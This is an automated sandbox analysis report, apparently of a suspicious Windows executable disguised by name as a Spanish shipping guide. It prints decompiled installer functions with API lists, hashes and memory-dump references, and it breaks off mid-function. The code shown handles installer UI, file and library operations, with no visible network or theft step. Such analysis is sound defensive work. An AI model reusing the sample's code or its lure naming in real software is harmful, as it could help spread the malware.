                        • API String ID: 1791965044-0
                        • Opcode ID: f53a322cad43cc745206088b0f9588d3eb2fb759a2f6d0f211223d7e95b3569e
                        • Instruction ID: 4cda744d2235eeec79e329deffdbcee87c219d4dd2552eefdcbdd148062f82ca
                        • Opcode Fuzzy Hash: f53a322cad43cc745206088b0f9588d3eb2fb759a2f6d0f211223d7e95b3569e
                        • Instruction Fuzzy Hash: B0817354C4D2E8A9DB16C7FA84613ECBFB15F67102F0881CAE0E566287C57A538EDB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x6e1f04
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}












                        0x0040138a
                        0x004013fa
                        0x00401392
                        0x0040139b
                        0x004013a0
                        0x00000000
                        0x00000000
                        0x004013a2
                        0x004013a3
                        0x004013ad
                        0x00000000
                        0x00401404
                        0x004013b0
                        0x004013b7
                        0x004013bd
                        0x004013be
                        0x004013c0
                        0x004013c2
                        0x004013b9
                        0x004013b9
                        0x004013ba
                        0x004013ba
                        0x004013c9
                        0x004013cb
                        0x004013f4
                        0x004013f4
                        0x004013c9
                        0x00000000

                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageA.USER32 ref: 004013F4
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                        • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                        • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                        • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                        0x00405f5f
                        0x00405f62
                        0x00405f69
                        0x00405f71
                        0x00405f7d
                        0x00000000
                        0x00405f84
                        0x00405f74
                        0x00405f7b
                        0x00000000
                        0x00405f8c
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                          • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                          • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                          • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                        • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                        • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                        • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                        0x004058a2
                        0x004058af
                        0x004058c4
                        0x004058ca

                        APIs
                        • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,80000000,00000003), ref: 004058A2
                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                        • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                        • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                        • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040587F(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                        0x00405883
                        0x0040588c
                        0x00000000
                        0x00405895
                        0x0040589b

                        APIs
                        • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                        • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                        • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                        • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                        0x004053f8
                        0x00405400
                        0x00000000
                        0x00405406
                        0x00000000

                        APIs
                        • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                        • GetLastError.KERNEL32 ref: 00405406
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                        • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                        • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                        0x004030b4
                        0x004030c7
                        0x004030cf
                        0x00000000
                        0x004030d6
                        0x00000000
                        0x004030d8

                        APIs
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                        • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                        • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                        • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                        0x004030f0
                        0x004030f6

                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                        • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                        • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                        • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004056E5, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004056E5(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                        0x004056e5
                        0x004056f8
                        0x004056f8
                        0x004056fc
                        0x00000000
                        0x00000000
                        0x004056ef
                        0x004056f2
                        0x00000000
                        0x004056f2
                        0x00000000
                        0x004056ef
                        0x004056fe

                        APIs
                        • CharNextA.USER32(?,00403215,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00409168), ref: 004056F2
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharNext
                        • String ID:
                        • API String ID: 3213498283-0
                        • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                        • Instruction ID: d90016124225ae7065af0310e7167278304a7e66743f3b900cadaec09162e188
                        • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                        • Instruction Fuzzy Hash: D3C08024C0D74567C550471041244677FE4AA61350F944C96F0C863170C5366C409F2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x6e1110
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                        0x00404ffa
                        0x00405000
                        0x00405009
                        0x0040500c
                        0x0040519d
                        0x004051a4
                        0x004051c8
                        0x004051c8
                        0x004051ce
                        0x004051db
                        0x004051f9
                        0x004051f9
                        0x00405200
                        0x00405257
                        0x00405257
                        0x0040525b
                        0x00000000
                        0x00000000
                        0x0040525d
                        0x00405260
                        0x00000000
                        0x00000000
                        0x0040526a
                        0x00405270
                        0x00405272
                        0x00405275
                        0x0040536e
                        0x00000000
                        0x0040536e
                        0x00405284
                        0x00405290
                        0x00405296
                        0x00405299
                        0x0040529c
                        0x004052b1
                        0x004052b4
                        0x004052b4
                        0x004052b7
                        0x0040529e
                        0x004052a3
                        0x004052a9
                        0x004052ac
                        0x004052ac
                        0x004052c7
                        0x004052cf
                        0x004052d0
                        0x004052d2
                        0x004052db
                        0x004052de
                        0x004052e5
                        0x004052ec
                        0x004052f4
                        0x004052f4
                        0x00405302
                        0x00405308
                        0x0040530b
                        0x0040530b
                        0x00405312
                        0x00405318
                        0x00405321
                        0x00405328
                        0x00405331
                        0x00405333
                        0x00405336
                        0x00405345
                        0x00405347
                        0x0040534d
                        0x0040534e
                        0x0040534f
                        0x0040534f
                        0x00405357
                        0x00405362
                        0x00405368
                        0x00405368
                        0x00000000
                        0x004052d2
                        0x00405202
                        0x00405208
                        0x00405238
                        0x0040523a
                        0x00405240
                        0x0040524b
                        0x0040524b
                        0x00405252
                        0x00000000
                        0x00405252
                        0x0040520c
                        0x00405216
                        0x00000000
                        0x004051dd
                        0x004051dd
                        0x004051e3
                        0x0040521b
                        0x00000000
                        0x00405224
                        0x004051ec
                        0x004051f1
                        0x004051f4
                        0x00000000
                        0x004051f4
                        0x004051db
                        0x00405012
                        0x00405016
                        0x0040501f
                        0x00405026
                        0x00405029
                        0x0040502c
                        0x0040502f
                        0x00405030
                        0x00405031
                        0x0040504a
                        0x0040504d
                        0x00405057
                        0x00405066
                        0x0040506e
                        0x00405076
                        0x0040507b
                        0x0040507e
                        0x0040508a
                        0x00405093
                        0x0040509c
                        0x004050bf
                        0x004050c5
                        0x004050d6
                        0x004050db
                        0x004050e9
                        0x004050f7
                        0x004050f7
                        0x004050fc
                        0x0040510a
                        0x0040510a
                        0x0040510f
                        0x00405112
                        0x00405117
                        0x00405123
                        0x0040512c
                        0x00405139
                        0x00405148
                        0x0040513b
                        0x00405140
                        0x00405140
                        0x00405154
                        0x00405154
                        0x00405168
                        0x00405171
                        0x0040517a
                        0x0040518a
                        0x00405196
                        0x00405196
                        0x00000000

                        APIs
                        • GetDlgItem.USER32 ref: 00405050
                        • GetDlgItem.USER32 ref: 0040505F
                        • GetClientRect.USER32 ref: 0040509C
                        • GetSystemMetrics.USER32 ref: 004050A4
                        • SendMessageA.USER32 ref: 004050C5
                        • SendMessageA.USER32 ref: 004050D6
                        • SendMessageA.USER32 ref: 004050E9
                        • SendMessageA.USER32 ref: 004050F7
                        • SendMessageA.USER32 ref: 0040510A
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                        • ShowWindow.USER32(?,00000008), ref: 00405140
                        • GetDlgItem.USER32 ref: 00405161
                        • SendMessageA.USER32 ref: 00405171
                        • SendMessageA.USER32 ref: 0040518A
                        • SendMessageA.USER32 ref: 00405196
                        • GetDlgItem.USER32 ref: 0040506E
                          • Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6
                        • GetDlgItem.USER32 ref: 004051B3
                        • CreateThread.KERNEL32 ref: 004051C1
                        • CloseHandle.KERNEL32(00000000), ref: 004051C8
                        • ShowWindow.USER32(00000000), ref: 004051EC
                        • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                        • ShowWindow.USER32(00000008), ref: 00405238
                        • SendMessageA.USER32 ref: 0040526A
                        • CreatePopupMenu.USER32 ref: 0040527B
                        • AppendMenuA.USER32 ref: 00405290
                        • GetWindowRect.USER32 ref: 004052A3
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                        • SendMessageA.USER32 ref: 00405302
                        • OpenClipboard.USER32(00000000), ref: 00405312
                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                        • GlobalLock.KERNEL32 ref: 0040532B
                        • SendMessageA.USER32 ref: 0040533F
                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                        • SetClipboardData.USER32 ref: 00405362
                        • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405368
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                        • String ID: {
                        • API String ID: 590372296-366298937
                        • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                        • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                        • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                        • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404802, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
